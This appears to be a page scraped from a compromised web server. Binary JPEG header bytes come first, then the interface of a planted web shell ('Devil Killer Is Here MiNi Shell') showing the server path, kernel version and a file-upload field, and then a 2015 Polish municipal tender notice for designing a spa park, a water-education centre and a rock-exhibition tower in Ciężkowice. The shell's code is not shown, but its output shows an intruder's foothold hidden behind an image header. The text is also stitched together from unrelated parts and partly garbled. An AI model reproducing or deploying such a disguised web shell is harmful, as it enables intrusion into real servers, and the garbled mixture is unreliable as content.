JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150311/34087-N-2015.html

<p class="kh_header"><b>Ciężkowice: Opracowania dokumentacji projektowej wraz  z niezbędnymi uzgodnieniami  dla uzbrojenia terenu oraz budowy: Parku Zdrojowego, Domu Wody oraz Skalnej Baszty, w ramach projektu: Przygotowanie dokumentacji dla projektu Zagospodarowanie turystyczno-edukacyjne Pogórza Ciężkowickiego 
z elementami ochrony przyrody</b><br>
<b>Numer ogłoszenia: 34087 - 2015; data zamieszczenia: 11.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Ciężkowicach , ul. Tysiąclecia 19, 33-190 Ciężkowice, woj. małopolskie, tel. 14 6510051, faks 14 6510944.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ciezkowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowania dokumentacji projektowej wraz  z niezbędnymi uzgodnieniami  dla uzbrojenia terenu oraz budowy: Parku Zdrojowego, Domu Wody oraz Skalnej Baszty, w ramach projektu: Przygotowanie dokumentacji dla projektu Zagospodarowanie turystyczno-edukacyjne Pogórza Ciężkowickiego 
z elementami ochrony przyrody.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest realizacja zadania p.n.: 
OPRACOWANIE DOKUMENTACJI PROJEKTOWEJ WRAZ  Z NIEZBĘDNYMI UZGODNIENIAMI  DLA UZBROJENIA TERENU ORAZ BUDOWY: PARKU ZDROJOWEGO, DOMU WODY ORAZ SKALNEJ BASZTY, W RAMACH PROJEKTU: PRZYGOTOWANIE DOKUMENTACJI DLA PROJEKTU ZAGOSPODAROWNIE TURYSTYCZNO-EDUKACYJNE POGÓRZA CIĘŻKOWICKIEGO Z ELEMENTAMI OCHRONY PRZYRODY.
2. Przedmiot zamówienia:
Przedmiotem postępowania i zamówienia jest wyłonienie wykonawcy w zakresie realizacji usługi obejmującej: Opracowanie dokumentacji projektowej wraz  z niezbędnymi uzgodnieniami  dla uzbrojenia terenu oraz budowy: Parku Zdrojowego, Domu Wody oraz Skalnej Baszty w ramach projektu: Przygotowanie dokumentacji dla projektu Zagospodarowanie turystyczno-edukacyjne Pogórza Ciężkowickiego z elementami ochrony przyrody.

Wykonanie ww. dokumentacji projektowej będącej przedmiotem zamówienia posłuży uzyskaniu decyzji administracyjnych, niezbędnych do rozpoczęcia procesu inwestycyjnego dla wykonania uzbrojenia terenu oraz budowy następujących obiektów:
- Park Zdrojowy
- Dom Wody
- Skalna Baszta.

Przedmiotowe projekty będą stanowiły spójny element kompleksowej dokumentacji projektowej, która pozwoli na pełne przygotowanie do wyznaczenia i zagospodarowania  pętli pieszo-rowerowej Źródlanego Szlaku, w przebiegu której znajdować się będą m. in. liczne atrakcje związane z wodolecznictwem (ogólnodostępne łazienki mineralne), infrastruktura edukacyjno-rekreacyjna (Międzynarodowe Centrum Edukacyjno-Naukowe, Dom Wody, Skalna Baszta, Park Zdrojowy), a także elementy podnoszące jakość oferty (wieże widokowe, parkingi, stanice rowerowe, punkty informacyjne, itp.).

Przed przystąpienia do opracowania właściwej dokumentacji technicznej (Projektów Budowlanych, Projektów wykonawczych, itp.), Wykonawca ma obowiązek przedstawić Zamawiającemu do zaakceptowania szkice koncepcyjne, ew. wizualizacje projektowanych obiektów, zawierające zarys proponowanych rozwiązań, w szczególności:  bryły obiektów kubaturowych, układy funkcjonalne, elementy zagospodarowania terenu wraz z ich proponowaną lokalizacją, itp.
Wykonawca ma również obowiązek konsultowania projektowanych rozwiązań funkcjonalnych, infrastrukturalnych oraz w zakresie systemów multimedialnych (dotyczy w szczególności części I i Części II zamówienia) z Wykonawcami dokumentacji projektowych, zleconych przez Zespół Parków Krajobrazowych, jako partnera projektu pn. Zagospodarowanie turystyczno-edukacyjne Pogórza Ciężkowickiego z elementami ochrony przyrody, aby w efekcie powstała spójna i kompatybilna dokumentacja projektowa.
Zamawiający przekaże Wykonawcy listę ww. Wykonawców w dniu podpisania umowy.

Zamówienie zostało podzielone na 4 części, tj.: 

Część I.
Opracowanie dokumentacji projektowej budowy uzbrojenia terenu na potrzeby niezbędnej infrastruktury komunalnej dla Międzynarodowego Centrum Edukacyjno-Naukowego (MCE-N) oraz  Parku Zdrojowego.

Zadanie obejmuje wykonanie projektu budowlanego infrastruktury wodnej i  kanalizacyjnej niezbędnej do zaopatrzenia w media MCE-N, jak i zlokalizowanego w jego sąsiedztwie Parku Zdrojowego - niezbędne w tym zakresie jest zaprojektowanie odcinka sieci wodociągowej i odcinka sieci kanalizacyjnej, jak również dodatkowej sieci kanalizacyjnej odprowadzającej wodę mineralną zużytą do celów leczniczych. Dodatkowo  w zakres zadania wchodzi wykonanie projektu przebudowy istniejącej drogi dojazdowej wraz z budową miejsc postojowych, budowy chodnika wzdłuż drogi  oraz oświetlenia ulicznego zasilanego z sieci elektrycznej lub z wykorzystaniem odnawialnych źródeł energii, a także projektu budowy parkingów dla potrzeb Parku Zdrojowego.

W ramach zadania przewiduje się:
- budowę sieci wodociągowej o długości ok. 950 m (dz. nr: 904, 995, 997, 913/1, 913/2, 913/3 w Ciężkowicach);
- budowę sieci kanalizacji sanitarnej o długości ok. 1,5 km (dz. nr:  914/5, 992/15, 1001, 999, 904, 993, 1013/1, 1013/2, 1013/3, 995, 992/11) oraz budowę odcinka kanalizacji  o długości ok. 0,4 km (dz. nr: 992/11, 997) wraz z niezbędną infrastrukturą umożliwiającą odprowadzenie zużytej wody z kąpieli leczniczych do sieci kanalizacji sanitarnej;
- przebudowę drogi dojazdowej i stanowiącej połączenie MCE-N z Rezerwatem Skamieniałe Miasto i Skalną basztą wraz z budową odwodnienia układu drogowego (dz. nr: 904, 997, 992/15, 993, 994, 996, 1013/1 1013/2, 1013/3, 995, 1010, 992/11, 1004, 1005);
- budowę chodnika wzdłuż drogi dojazdowej o długości ok. 995 km (dz. nr: 904, 997, 992/15, 993, 994, 996, 1013/1 1013/2, 1013/3, 995, 1010, 992/11, 1004, 1005) oraz miejsc postojowych (dz. nr 992/11, 1050, 1051);
- budowę oświetlenia ulicznego wzdłuż ww. drogi dojazdowej (zasilanego z sieci elektrycznej lub z wykorzystaniem energii ze źródeł odnawialnych) na  długości ok. 995 km (dz. nr: 904, 997, 992/15, 993, 994, 996, 1013/1 1013/2, 1013/3, 995, 1010, 992/11, 1004, 1005);
- budowa parkingów na potrzeby Parku Zdrojowego o łącznej powierzchni ok. 7000 m2 (dz. nr 992/11, 992/1, 1010).
Przedmiot zamówienia w części I obejmuje:
- Mapa zasadnicza do celów opiniodawczych w niezbędnym zakresie - 1 kpl. dla Zamawiającego oraz egzemplarze do uzgodnień, 
- Wyrysy i wypisy z mapy ewidencji gruntów w niezbędnym zakresie - 1 kpl. dla Zamawiającego oraz egzemplarze do uzgodnień, 
- Materiały do wniosku o uzyskanie Decyzji o środowiskowych uwarunkowaniach realizacji zamierzenia inwestycyjnego oraz wniosek wraz z jego złożeniem i uzyskaniem decyzji (w przypadku takiej konieczności - dot. parkingów i odcinka sieci kanalizacyjnej) - 1 egz. dla Zamawiającego oraz egzemplarze do złożenia wniosku, 
- Materiały do wniosku o ustalenie lokalizacji inwestycji celu publicznego po otrzymaniu ostatecznej decyzji środowiskowej oraz wniosek wraz z jego złożeniem i uzyskaniem decyzji (w przypadku takiej konieczności - dot. odcinka sieci kanalizacyjnej oraz parkingów) - 1 egz. dla Zamawiającego i egzemplarze do złożenia wniosku,
- Przygotowanie i zawarcie umów użyczenia z oświadczeniami dla terenu na cele budowlane w wymaganym zakresie dla każdej działki - 2 egz. dla Zamawiającego i egz. niezbędne do uzgodnień, 
- Mapa do celów projektowych - 1 egz. w wersji elektronicznej i 3 egz. w wersji papierowej, 
- Projekt architektoniczno-budowlany (wraz z projektem zagospodarowania terenu i planem bezpieczeństwa i ochrony zdrowia) Budowy odcinka sieci kanalizacji sanitarnej i odcinka sieci wodociągowej dla Parku Zdrojowego i Międzynarodowego Centrum Edukacyjno-Turystycznego  - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, 
- Projekt wykonawczy Budowy odcinka sieci kanalizacji sanitarnej i odcinka sieci wodociągowej dla Parku Zdrojowego i Międzynarodowego Centrum Edukacyjno- - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, 
- Projekt architektoniczno-budowlany (wraz z projektem zagospodarowania terenu i planem bezpieczeństwa i ochrony zdrowia) przebudowy drogi dojazdowej (z oświetleniem) do Parku Zdrojowego i Międzynarodowego Centrum Edukacyjno-Turystycznego wraz z budową odwodnienia układu drogowego oraz budową chodnika i miejsc postojowych - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń
- Projekt wykonawczy przebudowy drogi dojazdowej do Parku Zdrojowego 
i Międzynarodowego Centrum Edukacyjno-Turystycznego wraz z budową odwodnienia tej drogi oraz budową chodnika i miejsc postojowych - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, 
- Projekty wykonawcze (w przypadku konieczności) przebudowy (zabezpieczenia) urządzeń obcych (gaz, woda, kanalizacja sanitarna, teletechnika, energetyka, itp.) - 5 egz. dla Zamawiającego i egzemplarze niezbędne do uzgodnień, opinii i pozwoleń, 
- Projekt wycinki drzew (w przypadku konieczności) - 5 egz. dla Zamawiającego, 
- STWiOR - 3 egz.,
- Przedmiar robót - po 3 egz., 
- Kosztorys inwestorski - 3 egz., 
- Przedmiary robót należy sporządzić w oparciu o katalogi KNR lub KNNR. Kosztorysy inwestorskie należy wykonać metodą szczegółową, zgodnie z obowiązującymi przepisami. W wyjątkowych sytuacjach, uzasadnionych specyfiką prac, zastosować należy kalkulację indywidualną z wyszczególnieniem ilości roboczogodzin, ilości maszynogodzin oraz rodzaju (gatunku) typu materiałów.
- Dokumentacja w wersji elektronicznej (wszystkie opracowania w formie pdf - zeskanowane opracowania z uzgodnieniami) oraz w wersji edytowalnej: część opisowa (word,exel), rysunki w formacie dwg lub dxf) - 4 egz. (2 egz. w formacie pdf, 2 egz. w wersji edytowalnej). 
- Wniosek z materiałami do złożenia wniosku o wydanie pozwolenia wodnoprawnego wraz operatem wodnoprawnym (w przypadku takiej konieczności) - 1 egz. dla Zamawiającego wraz z wersją elektroniczną i 1 egz. do złożenia wniosku, 
- Wniosek z materiałami do złożenia wniosku o wydanie pozwolenia na wycinkę drzew (w przypadku takiej konieczności) - 1 egz. dla Zamawiającego i egzemplarze do złożenia wniosku, 
- Przygotowanie materiałów do złożenia wniosku o uzyskanie pozwolenia na budowę

Część II.
Opracowanie dokumentacji projektowej dla budowy Parku Zdrojowego  wraz z ogólnodostępnymi łazienkami mineralnymi, arboretum, alpinarium, ogrodem sensorycznym i ogrodem wodnym, siecią alejek, siłownią terenową i placem zabaw i oświetleniem solarnym.

Łazienki mineralne zostaną wybudowane na dz. nr 992/11 (Ciężkowice) i składać się będą 
z następujących elementów:
- częściowo zadaszona infrastruktura z wiatami, infrastruktura leczniczo-rehabilitacyjna (ogród wodny)  wykorzystująca metodę Kneippa,
- sieć alejek z małą architekturą (kosze, ławki, stojaki rowerowe), 
- ogród sensoryczny, 
- arboretum (ogród dendrologiczny), 
- alpinarium, 
- siłownia terenowa
- edukacyjny plac zabaw,
- parking 
- sieć oświetlenia z wykorzystaniem lamp na energię odnawialną.
- mała architektura 

Ogólnodostępny ogród wodny ma składać się z  systemu kaskad,  umożliwiających odbywanie kąpieli leczniczych, brodzenia itp. (Katalog produktów - załącznik do opracowania pn.  Założenia architektoniczne i metodologiczne Źródlanego szlaku wraz z określeniem poszczególnych elementów i funkcji obiektów na szlaku, wykorzystujących metodę Księdza Kneipp-a w podstawowym zakresie (stopy, kolana, dłonie, łokcie). Urządzenia będą wykonane z naturalnych materiałów (głównie kamień). Całość terenu oświetlona lampami solarnymi. Woda dla potrzeb terapii będzie miejscowo podgrzewana i pochodzić będzie z odwiertu wody mineralnej siarczkowo-solankowej, jak również z odwiertu wody pitnej sporządzonego na potrzeby powstałej infrastruktury.

Powstała infrastruktura lecznicza ma być zgodna z Założeniami architektonicznymi 
i metodologicznymi Źródlanego szlaku wraz z określeniem poszczególnych elementów i funkcji obiektów na szlaku stanowiącymi załącznik nr 9 do SWIZ.

W ramach projektu PARKU ZDROJOWEGO Wykonawca ma wykonać projekt systemów multimedialnych oraz dokonać doboru urządzeń zgodnie z Wytycznymi koncepcyjnymi dla systemów i rozwiązań wchodzących w skład produktu turystycznego Pogórza Ciężkowickiego - Wybrane gminy i obszary - załącznik nr 11 do SIWZ oraz w zgodzie z brzmieniem art. 29 Ustawy Pzp.
Przedmiot zamówienia w części II obejmuje:
- Mapa do celów projektowych - 1 egz. w wersji elektronicznej i 3 egz. w wersji papierowej,
- Projekt architektoniczno - budowlany składający się m in. z:
- wizualizacji,
- projektu nasadzeń,
- projektu zagospodarowania terenu,
- projekt techniczny (alejki, ścieżki, instalacje, altany, wiaty, urządzenia do wodolecznictwa, oświetlenie solarne) 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń,
- Dokumentacja w wersji elektronicznej(wszystkie opracowania w formie pdf - zeskanowane opracowania z uzgodnieniami) oraz w wersji edytowalnej: część opisowa (word,exel), rysunki w formacie dwg lub dxf) - 4 egz. (2 egz. w formacie pdf, 2 egz. w wersji edytowalnej). 
- Opracowanie projektu robót geologicznych do zatwierdzenia go przez odpowiednią instytucję (Starostwo Powiatowe w Tarnowie) wraz z Operatem wodnoprawnym na wykonanie urządzenia wodnego - dla studni zaopatrującej w wodę łazienki mineralne - 1 egz. dla Zamawiającego wraz z wersją elektroniczną i 1 egz. do złożenia wniosku,
- Opracowanie dokumentacji hydrogeologicznej ustalającej zasoby eksploatacyjne ujęcia oraz przekazanie dokumentacji celem zatwierdzenia do odpowiedniego organu administracji (Starostwo Powiatowe w Tarnowie) dla studni zaopatrującej w wodę łazienki mineralne - 1 egz. dla Zamawiającego wraz z wersją elektroniczną i 1 egz. do złożenia wniosku,
- Projekt wykonawczy 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń,
- STWiOR - po 3 egz. dla każdej branży, 
- Przedmiar robót - po 3 egz., 
- Kosztorys  inwestorski - 3 egz.,
- Przedmiary robót należy sporządzić w oparciu o katalogi KNR lub KNNR. Kosztorysy inwestorskie należy wykonać metodą szczegółową, zgodnie z obowiązującymi przepisami. W wyjątkowych sytuacjach, uzasadnionych specyfiką prac, zastosować należy kalkulację indywidualną z wyszczególnieniem ilości roboczogodzin, ilości maszynogodzin oraz rodzaju, gatunku, typu materiałów.
Część III.
Opracowanie kompleksowej dokumentacji projektowej dla budowy Domu Wody (Dom Wody - centrum balneologii i geologii).

Lokalizacja: działki nr: 639 i 640, 641/2 (budynek wraz z zagospodarowaniem przyległego terenu) oraz  działki nr: 632, 635 (przewiązka) w m. Ciężkowice, Gmina Ciężkowice; 
Powierzchnia zabudowy ok. 800 m2,
Powierzchnia użytkowa budynku ok. 1000 m2, 
Liczba kondygnacji: 2,
Wysokość: do 12 m,
Budynek wolnostojący, bez podpiwniczenia. 
Należy zaprojektować połączenie projektowanego budynku Domu Wody z istniejącym budynkiem Muzeum Przyrodniczego im. Krystyny i Włodzimierza Tomków, zlokalizowanym na dz. nr 635, przewiązką poprowadzoną ponad oddzielającą oba obiekty drogą gminną -  ul. Parkową (dz. nr 632) przy wykorzystaniu istniejącego wejścia do budynku muzeum od strony dz. nr 639, 640.
Uwaga!  Zamawiający jest w posiadaniu dokumentacji projektowej istniejącego budynku Muzeum Przyrodniczego im. K. i W. Tomków. Dokumentacja ta zostanie udostępniona Wykonawcy do wykorzystania przy prowadzeniu prac projektowych jako inwentaryzacja stanu istniejącego. 
Projekt Domu Wody powinien uwzględniać co najmniej nw. pomieszczenia:
- Pawilon edukacyjny (Foyer)
- Sala konferencyjno-edukacyjna
- Zaplecze biurowe, techniczne i socjalne
- Recepcja
- Zaplecze techniczne sceny i garderoba
oraz taras zewnętrzny.
Schemat połączeń funkcjonalnych pomieszczeń Dom Wody - centrum balneologii i geologii  stanowi załącznik nr 10 do SIWZ.

Wszystkie zaprojektowane pomieszczenia powinny posiadać właściwie dobrane poszczególne parametry techniczne, w tym wymiary, standardy instalacji elektrycznej, wentylacji, itp.  umożliwiające montaż i poprawne funkcjonowanie systemów multimedialnych projektowanej ekspozycji multimedialnej Domu Wody.

W zakres projektu wchodzi również kompletna dokumentacja branżowa, dotycząca instalacji zewnętrznych i przyłączy, przy czym obiekt będzie wyposażony w następujące instalacje wewnętrzne: elektryczną, wodociągową, kanalizacyjną, gazową, c.o., klimatyzację oraz systemy sterowania budynku i systemy zabezpieczające. Częścią dokumentacji będzie również zagospodarowanie terenu przyległego (otoczenie budynku) elementami małej architektury, w tym fontanna, wiaty drewniane itp.  wraz z elementami edukacyjnymi parku i urządzeniami wodnymi, a także ogrodzeniem zaprojektowanymi zgodnie z Założeniami architektonicznymi i metodologicznymi Źródlanego szlaku wraz z określeniem poszczególnych elementów i funkcji obiektów na szlaku stanowiącymi załącznik nr 9 do SWIZ.

W ramach projektu Domu Wody Wykonawca ma wykonać projekt systemów multimedialnych oraz dokonać doboru urządzeń zgodnie z Wytycznymi koncepcyjnymi dla systemów i rozwiązań wchodzących w skład produktu turystycznego Pogórza Ciężkowickiego - Dom Wody - centrum balneologii i geologii - załącznik nr 12 do SIWZ oraz w zgodzie z brzmieniem art. 29 Ustawy Pzp.


Dla potrzeb Domu Wody zostanie wykorzystana istniejąca powierzchnia postojowa w sąsiedztwie inwestycji. 


Dla powyższego zadania konieczne jest pozyskanie następujących dokumentów:
- Mapa do celów projektowych - 1 egz. w wersji elektronicznej i 3 egz. w wersji papierowej,
- Projekt architektoniczno-budowlany(wraz z projektem zagospodarowania terenu, planem bezpieczeństwa i ochrony zdrowia i charakterystyką energetyczną obiektu zgodnie z przepisami obowiązującymi na dzień oddania projektu) - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń
- Projekt wykonawczy 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń,
- STWiOR - po 3 egz. dla każdej branży, 
- Przedmiary robót (dla każdej branży oddzielnie) - po 3 egz. dla każdej branży, 
- Kosztorysy inwestorskie wraz ze zbiorczym zestawieniem kosztów - 3 egz.,
- Przedmiary robót należy sporządzić w oparciu o katalogi KNR lub KNNR. Kosztorysy inwestorskie należy wykonać metodą szczegółową, zgodnie z obowiązującymi przepisami. W wyjątkowych sytuacjach, uzasadnionych specyfiką prac, zastosować należy kalkulację indywidualną z wyszczególnieniem ilości roboczogodzin, ilości maszynogodzin oraz rodzaju (gatunku) typu materiałów.
- Projekt aranżacji wnętrza i scenariusz ekspozycji wraz doborem systemów i urządzeń multimedialnych ze schematami technicznymi - 3 egz.
- Przedmiary robót dla wykonania ekspozycji i wyposażenia budynku- 3 egz.,
- Kosztorys inwestorski wykonania ekspozycji i wyposażenia budynku - 3 egz.

Część IV.
Opracowanie kompleksowej dokumentacji projektowej dla budowy Skalnej Baszty (Skalna Baszta - geologiczna ekspozycja edukacyjna).

Lokalizacja; działka nr 1038/1 w m. Ciężkowice, gm. Ciężkowice
Powierzchnia zabudowy: ok. 80 m2,
Powierzchnia użytkowa: ok. 120 m2,
Wysokość do 18m.
Obiekt wolnostojący, bez podpiwniczenia, przekryty tarasem widokowym, założony na rzucie zbliżonym do owalu.
Skalna baszta będzie eksponować możliwie kompletny zbiór  minerałów i skał w ujęciu petrograficznym (skały magmowe, osadowe i metamorficzne). Nacisk położony zostanie na  fizjografię skał - ukazanie różnorodności, podstawowe cechy fizyko-chemiczne  i ewentualnie geografię  pokładów (tylko rozkład na terenie Polski i Małopolski). Najważniejsza  część ekspozycji   będzie  dotyczyć źródeł mineralnych (charakterystyka, różnice w składzie i co z nich wynika etc.). Skalna baszta ma za zadanie ukazywać bogactwo geologiczne (nie objaśnia procesów - te znajdą ilustrację w Domu wody).
Baszta będzie budowlą murowaną, w której ściany (również wzdłuż schodów) wbudowane zostaną elementy ekspozycji. Budowla zwieńczona tarasem pełniącym funkcje widokowe. 

Przedmiot zamówienia w części IV obejmuje:
- Mapa do celów projektowych - 1 egz. w wersji elektronicznej i 3 egz. w wersji papierowej,
- Projekt architektoniczno-budowlany(wraz z projektem zagospodarowania terenu i planem bezpieczeństwa i ochrony zdrowia) - 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń
- Projekt wykonawczy 5 egz. dla Zamawiającego oraz egzemplarze niezbędne do uzgodnień, opinii i pozwoleń,
- STWiOR - po 3 egz. dla każdej branży, 
- Przedmiary robót (dla każdej branży oddzielnie) - po 3 egz. dla każdej branży, 
- Kosztorys inwestorski (roboty budowlane) - 3 egz.,
- Przedmiary robót należy sporządzić w oparciu o katalogi KNR lub KNNR. Kosztorysy inwestorskie należy wykonać metodą szczegółową, zgodnie z obowiązującymi przepisami. W wyjątkowych sytuacjach, uzasadnionych specyfiką prac, zastosować należy kalkulację indywidualną z wyszczególnieniem ilości roboczogodzin, ilości maszynogodzin oraz rodzaju, gatunku, typu materiałów.
- Scenariusz ekspozycji wraz doborem systemów i urządzeń multimedialnych ze schematami technicznymi- 3 egz.
- Kosztorys inwestorski (wykonania i dostawy ekspozycji oraz wyposażenia budynku) - 3 egz.

W ramach projektu SKALNEJ BASZTY Wykonawca ma wykonać projekt systemów multimedialnych oraz dokonać doboru urządzeń zgodnie z Wytycznymi koncepcyjnymi dla systemów i rozwiązań wchodzących w skład produktu turystycznego Pogórza Ciężkowickiego - Wybrane gminy i obszary - załącznik nr 11 do SIWZ oraz w zgodzie z brzmieniem art. 29 Ustawy Pzp.

Zamawiający dopuszcza składanie ofert częściowych na jedną lub więcej części zamówienia.

3. Zamówienie należy wykonać z należytą starannością, zgodnie z aktualnie obowiązującymi przepisami, normami technicznymi, standardami, etyką zawodową oraz postanowieniami umowy, której istotne postanowienia stanowią załącznik nr 8 do SIWZ.
4. Dokumentacja projektowa powinna odpowiadać wymaganiom wynikającym z ustawy z dnia 7 lipca 1994 r. Prawo budowlane, być kompletna pod kątem prawnym i funkcjonalnym oraz z punktu widzenia celu jakiemu ma służyć oraz spełniać wymogi:
- ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - tak, aby mogła stanowić podstawę zorganizowania i przeprowadzenia przetargu i spełniać wymogi określone dla Opisu przedmiotu zamówienia w zamówieniach udzielanych w trybie Pzp na roboty budowlane, usługi, dostawy (art. 29-30 ustawy Pzp);
- Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. 2004, Nr 202, poz. 2072, z późn.zm.);
- Rozporządzenia Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. 2003 Nr 120, poz. 1126); 
